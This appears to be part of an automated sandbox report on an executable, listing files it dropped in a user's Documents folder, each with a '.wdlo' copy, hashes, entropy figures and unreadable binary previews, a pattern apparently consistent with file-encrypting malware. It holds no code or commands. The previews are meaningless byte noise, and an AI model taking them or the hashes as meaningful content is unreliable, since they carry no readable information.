                  Preview:LIJDS..q.':.)?q.6.U.,........2p.$.l....<..B.............K.....#b{.....7.[..x...0.w......'#8-..Q{.M.......&.PB...p`Cy.(..vu. b.G'.m.V.^(.wXw...Q7k.`..@1&..j..`N>V.....3.).*..&..vI..9$.9.mG..Wq...,...Z..>.5.[{..d.m_{.B..G%....s..B.@Q...#hp....uz..r.)..S~g.i.-.............c.4.....}..!..(......+R.F.g....U..v..M.u..-.1....&]A7.C..X|.y...A....6z...3.....dg........W@6A.....ty.........36..{}.}d[.J...I.A..ptqi=I$....F.>..A\..jF..'...sS...p~.Q..5N.*O.1.....l.....@v...(N...e.p..y.S.._B.O...PE*.M..4]KC.3.s...0.&1f.........Y..x?A....... 5.....$9dS..3..I..?0$v.zY47/...g..pu^..._..G.uw.....A.;..nH.@ g.q.m.s.j.-..l..bVT..h.cv....Yp^."<V0U#......._...QEo.Am.fl..$......e./Q6RW|J...q...oA.B...!.PV.X.....B..y...H.....0.B.?..}T;8.p.Z..,%.Xa.c..:....l!;.S9...#HT..p.\|f..#...KG6<..j..H.'&a.^....TN.F}.N..}Z4+.9.A..g..o.S9..J.9..u...iQ......[kd+..r.H......... 0".K.... ...A.k.T.>.....aZ...A=.S,x:...NJ]...B......Y......;3...k>...'....D......q....W..o.;

                  C:\Users\user\Documents\LIJDSFKJZG.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847821696283631
                  Encrypted:false
                  SSDEEP:24:MKkwFm92pz1BtWSAxu6yZluf57CWs5ap988h3t9bvilF3XMPAR9qULRaJ+z2WdYT:MK5o9k1BT6AQfVCG988hCF3XMPe9ZdeL
                  MD5:ED7C866802AF8A2F2E6CA7EF5B2AB97A
                  SHA1:97404CBA9ED202834DCF2B1CFB016D2E7A63C90B
                  SHA-256:DA4F18C54BC4346C5CEE9272E2A0856BF82E87F62B6D300E4819523359EF28CB
                  SHA-512:3A39D15A387E793D4F8B891A603F87509C5BE8792EE062E4FBC67EC21AD292865CFBC2ADF033E70C81B2759392AACA6C5B1CE6F5E91796643A9EF29E48A185F4
                  Malicious:false
                  Preview:LIJDS.4.=........^..K......N..._#q....3..+...#Q)......!......'.o ......II.M..".....".A.qZH..}v....P.....p..g....9...&...^.Wh.>No.).t.N.l&.....p.".OU.K.....n.mW.e..f.Yk.lf.a..;5X..X.X.H9`.(1.:..C....H8^_0.~.)49..t5F./^.]Q .R..)"8N........>j..c.....{.........D.^4.. x.?[..I....t.Gn.....4....c.-....7P..nh...k.......K.R..d..'. .2q.....$;.z\...y..z.>3?.F.S.>.5..&\....|~.Y.5E.."H6.....O...)R2h.. ......I$.T8\.p..Q..0"....n.5..[.........#7Z..xc.R_p.3;.....u....m`....W@z.9...1PpE]=*....M...8....=..kC.U...E...Y..)..D{....&.....j..jVmX......c.3i...s...-.m...,.Q.....T...........Z.6..['.D.r..CM..y.+.Tq..,.....9.J.,.y....j...s.A._W...a.[.>.%..'.3..B.......9.|ju..V......G4...7..{b)4.n"..>&........(.)Rc[k.U..ffUM...R.._..`...5....}.)...t.fk..x.6=...U.,...!W~...jY7.{$.).bU.E..0).x.m.$[:./r*.T.{..i.c).TC..@......=.W...........c2Y.....Q.!2Sq.G.....e6...:.....B?...NI..p.*..6..n.DB...{bx.`..D..}.....,UR.y,...7...{66....Wg6.;l...".'.;&..$.xD.....:..b..

                  C:\Users\user\Documents\LIJDSFKJZG.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847821696283631
                  Encrypted:false
                  SSDEEP:24:MKkwFm92pz1BtWSAxu6yZluf57CWs5ap988h3t9bvilF3XMPAR9qULRaJ+z2WdYT:MK5o9k1BT6AQfVCG988hCF3XMPe9ZdeL
                  MD5:ED7C866802AF8A2F2E6CA7EF5B2AB97A
                  SHA1:97404CBA9ED202834DCF2B1CFB016D2E7A63C90B
                  SHA-256:DA4F18C54BC4346C5CEE9272E2A0856BF82E87F62B6D300E4819523359EF28CB
                  SHA-512:3A39D15A387E793D4F8B891A603F87509C5BE8792EE062E4FBC67EC21AD292865CFBC2ADF033E70C81B2759392AACA6C5B1CE6F5E91796643A9EF29E48A185F4
                  Malicious:false
                  Preview:LIJDS.4.=........^..K......N..._#q....3..+...#Q)......!......'.o ......II.M..".....".A.qZH..}v....P.....p..g....9...&...^.Wh.>No.).t.N.l&.....p.".OU.K.....n.mW.e..f.Yk.lf.a..;5X..X.X.H9`.(1.:..C....H8^_0.~.)49..t5F./^.]Q .R..)"8N........>j..c.....{.........D.^4.. x.?[..I....t.Gn.....4....c.-....7P..nh...k.......K.R..d..'. .2q.....$;.z\...y..z.>3?.F.S.>.5..&\....|~.Y.5E.."H6.....O...)R2h.. ......I$.T8\.p..Q..0"....n.5..[.........#7Z..xc.R_p.3;.....u....m`....W@z.9...1PpE]=*....M...8....=..kC.U...E...Y..)..D{....&.....j..jVmX......c.3i...s...-.m...,.Q.....T...........Z.6..['.D.r..CM..y.+.Tq..,.....9.J.,.y....j...s.A._W...a.[.>.%..'.3..B.......9.|ju..V......G4...7..{b)4.n"..>&........(.)Rc[k.U..ffUM...R.._..`...5....}.)...t.fk..x.6=...U.,...!W~...jY7.{$.).bU.E..0).x.m.$[:./r*.T.{..i.c).TC..@......=.W...........c2Y.....Q.!2Sq.G.....e6...:.....B?...NI..p.*..6..n.DB...{bx.`..D..}.....,UR.y,...7...{66....Wg6.;l...".'.;&..$.xD.....:..b..

                  C:\Users\user\Documents\LIJDSFKJZG\BWDRWEEARI.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856107371140984
                  Encrypted:false
                  SSDEEP:24:xUsFupJlSX875n+FjOY4BsRyD/aC86NsmgoZpVEQ8RhpzZpnpkM9gFHpe3zbD:xUsFupSX875n+ROfasD86Rgo8RhVZdqk
                  MD5:F07252FE40C579F1E555903F88F20C88
                  SHA1:78585A3EEE582CF81AB82A89ED4122880ABBED86
                  SHA-256:2FD41A8D9BA9FE2B77A57DA9013D7272634B94AEE722861CDDCADE793A6D81A0
                  SHA-512:00789A65CC08BB10307FBB8C1A46F7358FF8B8DB881C252EA43380527DA290B1DC1F6184C1D9BD357CA781E78F46DC71956D0D09F811B21A50078393F00352B4
                  Malicious:false
                  Preview:BWDRW.:1X(}.i.3j>.......)C...?..aC..g6.....;.J.p?.5......K.~q.#k..{..e.".b....8y.QX4..S.l[...Y..1... ...!+....9|$.N..$..Q.yKF.y3.".q.`.<a*g...8.0.@...x.Mjy...`;p.*.Tv.@...B.-........./`..2.V....i.zEl.9...X..D..4).S8L.Z...F...4S..d..T...[4..z.0.*...>\D...A.z!._.S.p6`....._...E ..Q.[.*.*bF..6...Q.Cl...6p7?r..&-.}N..%S....F.G..@..;.T&..k..)x....a....B.mt...40...~...&..R..y0.r.!..2......0............,.8../*J.b.2|9T.&.D.R........g....w.b.v....M.....&)..A.[...(.`.6....9..6...SX..b.}..Q....`.e1q4.._*O.....U..&..P....-.l.7.m[8.'..5..{.....n.E......./E.."~..;.r@.!.q.K.].U.......Z.F.k..Y8..X.@.v....&....82............Y.....D..?..?,.....B..w.]<B...........-?.k.hz]....... )dm..,.M.9..t....d...h....az.6...L[.!..5..>....o....?.&..._Z"...).~.7..v.R3.F.....o....;...Qm...Y.......|"g...R!.......4....A..ZP....8..V...g.q....Rg.....uL..........C.5-..s...gZ.X..}]..Cl.&.!.X.6....k....~K..n6.D...m......1*....`..X.X-...y.u..J......].\M...)..=.|...kl.Z..9..z.

                  C:\Users\user\Documents\LIJDSFKJZG\BWDRWEEARI.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856107371140984
                  Encrypted:false
                  SSDEEP:24:xUsFupJlSX875n+FjOY4BsRyD/aC86NsmgoZpVEQ8RhpzZpnpkM9gFHpe3zbD:xUsFupSX875n+ROfasD86Rgo8RhVZdqk
                  MD5:F07252FE40C579F1E555903F88F20C88
                  SHA1:78585A3EEE582CF81AB82A89ED4122880ABBED86
                  SHA-256:2FD41A8D9BA9FE2B77A57DA9013D7272634B94AEE722861CDDCADE793A6D81A0
                  SHA-512:00789A65CC08BB10307FBB8C1A46F7358FF8B8DB881C252EA43380527DA290B1DC1F6184C1D9BD357CA781E78F46DC71956D0D09F811B21A50078393F00352B4
                  Malicious:false
                  Preview:BWDRW.:1X(}.i.3j>.......)C...?..aC..g6.....;.J.p?.5......K.~q.#k..{..e.".b....8y.QX4..S.l[...Y..1... ...!+....9|$.N..$..Q.yKF.y3.".q.`.<a*g...8.0.@...x.Mjy...`;p.*.Tv.@...B.-........./`..2.V....i.zEl.9...X..D..4).S8L.Z...F...4S..d..T...[4..z.0.*...>\D...A.z!._.S.p6`....._...E ..Q.[.*.*bF..6...Q.Cl...6p7?r..&-.}N..%S....F.G..@..;.T&..k..)x....a....B.mt...40...~...&..R..y0.r.!..2......0............,.8../*J.b.2|9T.&.D.R........g....w.b.v....M.....&)..A.[...(.`.6....9..6...SX..b.}..Q....`.e1q4.._*O.....U..&..P....-.l.7.m[8.'..5..{.....n.E......./E.."~..;.r@.!.q.K.].U.......Z.F.k..Y8..X.@.v....&....82............Y.....D..?..?,.....B..w.]<B...........-?.k.hz]....... )dm..,.M.9..t....d...h....az.6...L[.!..5..>....o....?.&..._Z"...).~.7..v.R3.F.....o....;...Qm...Y.......|"g...R!.......4....A..ZP....8..V...g.q....Rg.....uL..........C.5-..s...gZ.X..}]..Cl.&.!.X.6....k....~K..n6.D...m......1*....`..X.X-...y.u..J......].\M...)..=.|...kl.Z..9..z.

                  C:\Users\user\Documents\LIJDSFKJZG\BXAJUJAOEO.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837614817995467
                  Encrypted:false
                  SSDEEP:24:lhyIsQO36rmNC1ccYa1RxwpLc5BJHWO68Aifpk7KxFC6opBc6t3zbD:WIsLqrkCuaiG5vI81k74w1pBc6t3nD
                  MD5:BE564DA7AEA2845BCEE36609F121E299
                  SHA1:708A33CB8A2CE40731879188A0F9C9CF28D25B6D
                  SHA-256:09BE5D29CE8AAB51C0AD659A402D79BD8DA8FE6B4E5D7F7EFDA5B3295487CC69
                  SHA-512:85DDA152980DA67B5A775189EF5BD906A2F92340E7869901F1620B566B5FE24E3EA78AB4DB61D59AF2E796EFCCB88D204AD0035AE53B671C3AD2F16742EED064
                  Malicious:false
                  Preview:BXAJUM...6..IF.u.<.'i.....y....fN...].yh.l.I{.M..{$..O+...ju......\...}X.....u.....]#.......4...Z=-.....<..&.{.d..t..3..(.@.B...P@I=&....:.....WB-7..m.\....Rd..;..s.{..5...A...4``b...,.ef.v~F.P.l._.......9n.|c4cl0Ed..z.h..Vy......i.........h....wm2..P../...]O?+!.QT.........p.z..A..q.....'.`W......$.&6)#.r..#....b%d......G....=..b..kKQ+.........j.<.J......d...B.k....W..O.wpL~V....)7;.....E.....n..{.l.A6..O..ca.{..%..5........{.."....p.2%............^.y.d....{...l..K..H..$..y...........3W.0.......i.PX*Ah.f..{2#9~.z.Q..G..E.......9.j."....cM..._......m`.EJ).....A}.EB....i&.6...J{............Nd.~/....G...d...#..F+.-.TF.[.#...........k.#r.w.^...6......nF.t.Y......:..\.J.T.17bP.k4....xK...]7...7S....m.>.`..[/..C.M..1..+(....1.R"^..|.$.W.1.i..~.....+...@8......R.7..w...xB..U.|1.4.TU.!9.*x...3...(..I.....;..<....Uaw..|......=oX........6.RC.EO...]O.I\82..OM.....'4.N...'.48.a...g..[h........J..U.o.a....,4..+q.8.&...pU".[..Z.......}.|1Qc....

                  C:\Users\user\Documents\LIJDSFKJZG\BXAJUJAOEO.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837614817995467
                  Encrypted:false
                  SSDEEP:24:lhyIsQO36rmNC1ccYa1RxwpLc5BJHWO68Aifpk7KxFC6opBc6t3zbD:WIsLqrkCuaiG5vI81k74w1pBc6t3nD
                  MD5:BE564DA7AEA2845BCEE36609F121E299
                  SHA1:708A33CB8A2CE40731879188A0F9C9CF28D25B6D
                  SHA-256:09BE5D29CE8AAB51C0AD659A402D79BD8DA8FE6B4E5D7F7EFDA5B3295487CC69
                  SHA-512:85DDA152980DA67B5A775189EF5BD906A2F92340E7869901F1620B566B5FE24E3EA78AB4DB61D59AF2E796EFCCB88D204AD0035AE53B671C3AD2F16742EED064
                  Malicious:false
                  Preview:BXAJUM...6..IF.u.<.'i.....y....fN...].yh.l.I{.M..{$..O+...ju......\...}X.....u.....]#.......4...Z=-.....<..&.{.d..t..3..(.@.B...P@I=&....:.....WB-7..m.\....Rd..;..s.{..5...A...4``b...,.ef.v~F.P.l._.......9n.|c4cl0Ed..z.h..Vy......i.........h....wm2..P../...]O?+!.QT.........p.z..A..q.....'.`W......$.&6)#.r..#....b%d......G....=..b..kKQ+.........j.<.J......d...B.k....W..O.wpL~V....)7;.....E.....n..{.l.A6..O..ca.{..%..5........{.."....p.2%............^.y.d....{...l..K..H..$..y...........3W.0.......i.PX*Ah.f..{2#9~.z.Q..G..E.......9.j."....cM..._......m`.EJ).....A}.EB....i&.6...J{............Nd.~/....G...d...#..F+.-.TF.[.#...........k.#r.w.^...6......nF.t.Y......:..\.J.T.17bP.k4....xK...]7...7S....m.>.`..[/..C.M..1..+(....1.R"^..|.$.W.1.i..~.....+...@8......R.7..w...xB..U.|1.4.TU.!9.*x...3...(..I.....;..<....Uaw..|......=oX........6.RC.EO...]O.I\82..OM.....'4.N...'.48.a...g..[h........J..U.o.a....,4..+q.8.&...pU".[..Z.......}.|1Qc....

                  C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8647498203665505
                  Encrypted:false
                  SSDEEP:24:LPxY35sBnlNo7gqhmFEi8uQZ0h6lHXgvNWKtJ8jzCwwmk6/k3zbD:LJWUs7g4mFEzbZD5gFWKD8jbwm5/k3nD
                  MD5:2C98DA9FB01DB244D58AC649171BCFB4
                  SHA1:D5265C124C440E5A3A7FA3586D0DC8276646199E
                  SHA-256:264177510F15E2E0782076B02702B01FFDCE683F887FAED4117BE4D432DB856F
                  SHA-512:4DBA35715D18C99E617EDFAB5B4CCB4749F173827328AA8340935AC1620B23B04C3BE6312F8511F605E56397522F4E8CC31613D328A5BCFADBE8D1F13F06F4F5
                  Malicious:false
                  Preview:LIJDS/.I2....mq]..y;.l!=K.b....L;`.J..k.}.7..J..\Q...q.`..Do.*@.....}."..f.E..TzYJ..NC..<2X..I.......u.!........CF>.Mw$..O.7....)....'.....N..5.\t..L.=.D..}S...k9u..H...[..R.F.nZ>..D.C...C.L......|9..}.*...*...........a...fg..m....).G... 1zQ..A.....#H.C.2..O..E..o....p+.r.....6'S.w..U.M..M.D.X:..,....3..Rw+-L..6.. ...).#`L......8Y.{.-.D...K..X.it4.Y.Z...t.C.N...s.U..U..Mp...@.%.....&y.M...e..u.......%.#Rt<A,...RD^gj._W.O..d.4)..... k.Y9j.0.....r..+.$.fWZ..q..o..{..'J..9.;!b...z#..Q.....zM.r.e.>..$..T...^...1....<c ...Vj...3.. ..?yFQ.........~.~.e.W.A.c.c.Y.A.7.F(,....b....L.sN..}..`...l|...?;t>=P....A...!..&...E.&./}..^...H..bn.E.6}gp.!.?..=...;..a.a ....Po....A.......rCA....e...._...DS..G..[.<..{.....1/....@....{\....Kh2..E^u.....=K.|,.T....o.7...#.O.....S..[J.!XT..........+.....t.%O,..S......7'SC6.T..oiF..T.4..'....Zh2.....{E..Z...$.^..!.O..E...;..Ii.28...k#6..Ps.H...D|.Y.....!.M..a.......&R.lF..p3...SUn.`....H..8..T..'...p.K.._g...

                  C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8647498203665505
                  Encrypted:false
                  SSDEEP:24:LPxY35sBnlNo7gqhmFEi8uQZ0h6lHXgvNWKtJ8jzCwwmk6/k3zbD:LJWUs7g4mFEzbZD5gFWKD8jbwm5/k3nD
                  MD5:2C98DA9FB01DB244D58AC649171BCFB4
                  SHA1:D5265C124C440E5A3A7FA3586D0DC8276646199E
                  SHA-256:264177510F15E2E0782076B02702B01FFDCE683F887FAED4117BE4D432DB856F
                  SHA-512:4DBA35715D18C99E617EDFAB5B4CCB4749F173827328AA8340935AC1620B23B04C3BE6312F8511F605E56397522F4E8CC31613D328A5BCFADBE8D1F13F06F4F5
                  Malicious:false
                  Preview:LIJDS/.I2....mq]..y;.l!=K.b....L;`.J..k.}.7..J..\Q...q.`..Do.*@.....}."..f.E..TzYJ..NC..<2X..I.......u.!........CF>.Mw$..O.7....)....'.....N..5.\t..L.=.D..}S...k9u..H...[..R.F.nZ>..D.C...C.L......|9..}.*...*...........a...fg..m....).G... 1zQ..A.....#H.C.2..O..E..o....p+.r.....6'S.w..U.M..M.D.X:..,....3..Rw+-L..6.. ...).#`L......8Y.{.-.D...K..X.it4.Y.Z...t.C.N...s.U..U..Mp...@.%.....&y.M...e..u.......%.#Rt<A,...RD^gj._W.O..d.4)..... k.Y9j.0.....r..+.$.fWZ..q..o..{..'J..9.;!b...z#..Q.....zM.r.e.>..$..T...^...1....<c ...Vj...3.. ..?yFQ.........~.~.e.W.A.c.c.Y.A.7.F(,....b....L.sN..}..`...l|...?;t>=P....A...!..&...E.&./}..^...H..bn.E.6}gp.!.?..=...;..a.a ....Po....A.......rCA....e...._...DS..G..[.<..{.....1/....@....{\....Kh2..E^u.....=K.|,.T....o.7...#.O.....S..[J.!XT..........+.....t.%O,..S......7'SC6.T..oiF..T.4..'....Zh2.....{E..Z...$.^..!.O..E...;..Ii.28...k#6..Ps.H...D|.Y.....!.M..a.......&R.lF..p3...SUn.`....H..8..T..'...p.K.._g...

                  C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844670945690838
                  Encrypted:false
                  SSDEEP:24:5UHGm7QOe2JKZzWOnifVB9H/mld2NI5XGUI1RGFZ+8xSNPQxgHdOqK8II3zbD:i1+23ms/9H/1NfUCRG5uJHdaC3nD
                  MD5:F10FDBA144E0354F06943FC51C29602F
                  SHA1:BEECF0C9CA3C65D42775B4EE40E2E673D29AAD61
                  SHA-256:BF5AF0C71F649860AA771DBB57E8A950C7BBD29487CA4C2A0A393B275BC22D8E
                  SHA-512:428D2489BEFB0AD2FC80C79FA3755B1859B325181714AB30720E47DE3BCABF92B5C7007A8AA659B86C13971CFAD8EE25FAAE520A07643DF3BB73C18885F3CF6C
                  Malicious:false
                  Preview:PWZOQ...[]ZiU..u:tE....}H;.0..x.Z..6.m...e.f..\...#..I[z&.Om^Nq;L..d.A.Y...OK....b.E.)o...A..Z#$?..}j.:..0d....&..~...[.j..i.e.).....;..:1....(...G^.(b...../..,.kZOq$t.)..`*..U\.2m7\..3..y7.\.z:.hd.t.4z.;...\.cK..]..&..c.m?...A.=.9..t..rR. ........<...q..2...4i.. .&..C..y....I.Q...Y...v.....U(._...2..`.....[A...|.aZXe..N..d....^.7p....+.....x.i....t.{'/..Q.;nm.uT.K.Im.2......Q\_.4.....b...2N..gV......{.@.4...3..v..4...J..+U._E.{T.s.$22......S.l.`I...2^..9.j.5e"n.Ql...t.....v.D.....%.7.......c.o..5....%.= #M.o....LH..2.f..s..>,!`lM.Bh.9......"..q>.~....v.'......M0..1.L...2w.....R].gg...........}..K.....4.......(.Bcs<X|...!.~..m._.f3..S.#...vb....x..U..E%...r...|..K.l+...j...hX......#.=......J!Z...,5g..v...%.b.G...N.G.A.......n....>S\.g.u.z..4....B8.uv......5.c.+?..lX..hH..z.3*.{gG.#8.Y.Hfxas.m...<a+.v~..x...RXZ6$K.4.....7.....c.d..@c.\.b]..{ #.....e(.T.nT..-.....k.....l.y..s.I....i@.}7~............#ZV.....x...x.hlr.c.;Xp5..j.......

                  C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844670945690838
                  Encrypted:false
                  SSDEEP:24:5UHGm7QOe2JKZzWOnifVB9H/mld2NI5XGUI1RGFZ+8xSNPQxgHdOqK8II3zbD:i1+23ms/9H/1NfUCRG5uJHdaC3nD
                  MD5:F10FDBA144E0354F06943FC51C29602F
                  SHA1:BEECF0C9CA3C65D42775B4EE40E2E673D29AAD61
                  SHA-256:BF5AF0C71F649860AA771DBB57E8A950C7BBD29487CA4C2A0A393B275BC22D8E
                  SHA-512:428D2489BEFB0AD2FC80C79FA3755B1859B325181714AB30720E47DE3BCABF92B5C7007A8AA659B86C13971CFAD8EE25FAAE520A07643DF3BB73C18885F3CF6C
                  Malicious:false
                  Preview:PWZOQ...[]ZiU..u:tE....}H;.0..x.Z..6.m...e.f..\...#..I[z&.Om^Nq;L..d.A.Y...OK....b.E.)o...A..Z#$?..}j.:..0d....&..~...[.j..i.e.).....;..:1....(...G^.(b...../..,.kZOq$t.)..`*..U\.2m7\..3..y7.\.z:.hd.t.4z.;...\.cK..]..&..c.m?...A.=.9..t..rR. ........<...q..2...4i.. .&..C..y....I.Q...Y...v.....U(._...2..`.....[A...|.aZXe..N..d....^.7p....+.....x.i....t.{'/..Q.;nm.uT.K.Im.2......Q\_.4.....b...2N..gV......{.@.4...3..v..4...J..+U._E.{T.s.$22......S.l.`I...2^..9.j.5e"n.Ql...t.....v.D.....%.7.......c.o..5....%.= #M.o....LH..2.f..s..>,!`lM.Bh.9......"..q>.~....v.'......M0..1.L...2w.....R].gg...........}..K.....4.......(.Bcs<X|...!.~..m._.f3..S.#...vb....x..U..E%...r...|..K.l+...j...hX......#.=......J!Z...,5g..v...%.b.G...N.G.A.......n....>S\.g.u.z..4....B8.uv......5.c.+?..lX..hH..z.3*.{gG.#8.Y.Hfxas.m...<a+.v~..x...RXZ6$K.4.....7.....c.d..@c.\.b]..{ #.....e(.T.nT..-.....k.....l.y..s.I....i@.}7~............#ZV.....x...x.hlr.c.;Xp5..j.......

                  C:\Users\user\Documents\LIJDSFKJZG\WHZAGPPPLA.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853473615697189
                  Encrypted:false
                  SSDEEP:24:/a/ijWSqpqVppqLRoSP1NQojVjCL38C9Qbgm/IIUW2Vi8I1Z3zbD:y/AWS/EKaKojdu3D9QbP/kW2Y1Z3nD
                  MD5:D0B3A51DE7BF71ED6FCEE791572C033E
                  SHA1:D9F6CB87F8D04B760C64C2FE2FEB02A3E154F6A1
                  SHA-256:2C7E53017C4F58C99ED086ABD1D775A928D3FA955A7C77C01E8E2CA31DA0BE45
                  SHA-512:BF93E96D30B20B6FA808049751DEFD80A3D5497A689B077CAFAC80030171383C4849756BD334A3D7729C8C4321E4FD9B21BD6ECA046E6CA1FC2B08D065015402
                  Malicious:false
                  Preview:WHZAG.+9...H.,{..e.......o.q......Mn2@w"..4 .U...X@|.'......_.P.}...u..f.N..T...8...y...xAZ.S.........'wS.q:.}.z..w....3.;X.9s......G.J.s-H..i...F..T,.5.c ..,.s_.IWs..y..c..h....}'~D..%.|}.t>.'<....E1.'..M]....s.'...D..H..Y..HAt|.P~..x.mZ.......oB.W*u.V.m.q..t...T.X.e:.6.WG8o..e..7f..@b..A......y.......E].r.iU..Dwk..Y.d..hx...~cm.3.$.)M\8..m....@N..!f.hn6....p.p......iUr..M....dC..:.......\u6.........D]M.efQ..`OQ.v3....T.=T.A......'..{*..............h%b.......).5.w......=.............5Z..7<.u....N.K.!.........Q..;.`....df...E+..*........2{.....L.._.A3.m[..j7.......]..h.......k.7$...94.O.C................!....A._3,z.*...)..0.4~w...`..-j..........@....;...x.PI...[.3ig.@A.n^zfdo.........W...8....h/.y.....@...!.....!..8.u........"..B..5a.J..}].6...~...0.V..&lT.c.. .c...%/.3.b.r...."....7..S$h...Z.c.......n.!.|q...LN...s.oj..#w...E.i....7......zf.<M...Ph.(g#.G....$..3U.@......I....|+.r....B..V..3^.".C.......p...J.A]...,M.6.6.'>..!W.....

                  C:\Users\user\Documents\LIJDSFKJZG\WHZAGPPPLA.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853473615697189
                  Encrypted:false
                  SSDEEP:24:/a/ijWSqpqVppqLRoSP1NQojVjCL38C9Qbgm/IIUW2Vi8I1Z3zbD:y/AWS/EKaKojdu3D9QbP/kW2Y1Z3nD
                  MD5:D0B3A51DE7BF71ED6FCEE791572C033E
                  SHA1:D9F6CB87F8D04B760C64C2FE2FEB02A3E154F6A1
                  SHA-256:2C7E53017C4F58C99ED086ABD1D775A928D3FA955A7C77C01E8E2CA31DA0BE45
                  SHA-512:BF93E96D30B20B6FA808049751DEFD80A3D5497A689B077CAFAC80030171383C4849756BD334A3D7729C8C4321E4FD9B21BD6ECA046E6CA1FC2B08D065015402
                  Malicious:false
                  Preview:WHZAG.+9...H.,{..e.......o.q......Mn2@w"..4 .U...X@|.'......_.P.}...u..f.N..T...8...y...xAZ.S.........'wS.q:.}.z..w....3.;X.9s......G.J.s-H..i...F..T,.5.c ..,.s_.IWs..y..c..h....}'~D..%.|}.t>.'<....E1.'..M]....s.'...D..H..Y..HAt|.P~..x.mZ.......oB.W*u.V.m.q..t...T.X.e:.6.WG8o..e..7f..@b..A......y.......E].r.iU..Dwk..Y.d..hx...~cm.3.$.)M\8..m....@N..!f.hn6....p.p......iUr..M....dC..:.......\u6.........D]M.efQ..`OQ.v3....T.=T.A......'..{*..............h%b.......).5.w......=.............5Z..7<.u....N.K.!.........Q..;.`....df...E+..*........2{.....L.._.A3.m[..j7.......]..h.......k.7$...94.O.C................!....A._3,z.*...)..0.4~w...`..-j..........@....;...x.PI...[.3ig.@A.n^zfdo.........W...8....h/.y.....@...!.....!..8.u........"..B..5a.J..}].6...~...0.V..&lT.c.. .c...%/.3.b.r...."....7..S$h...Z.c.......n.!.|q...LN...s.oj..#w...E.i....7......zf.<M...Ph.(g#.G....$..3U.@......I....|+.r....B..V..3^.".C.......p...J.A]...,M.6.6.'>..!W.....

                  C:\Users\user\Documents\LIJDSFKJZG\WSHEJMDVQC.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841078141380988
                  Encrypted:false
                  SSDEEP:24:pdTvBOTA65n/0eX/UJuFK7JlbVLBeDCnil5DQAhZ5VAXFPRXokth3zbD:pdVOTA65d+uFKdLBDy5QKA/7h3nD
                  MD5:615DAF267F4F84389F17FC6F14D39451
                  SHA1:545218EDA47DF8C85BC236FDAC1EF997C7EB6A2B
                  SHA-256:F70A90BD23E35C051FB76A449F6BB6D47D72A387BEDD5C0AB9075FDC7431E284
                  SHA-512:CB1764B33919D465EE165F2A7B32209EE8DB85DAAA87345AAA65FF1432AE638E313DBCA1DED55F8D142F173FABF234339BB805B5BEFF18852759AE0737159668
                  Malicious:false
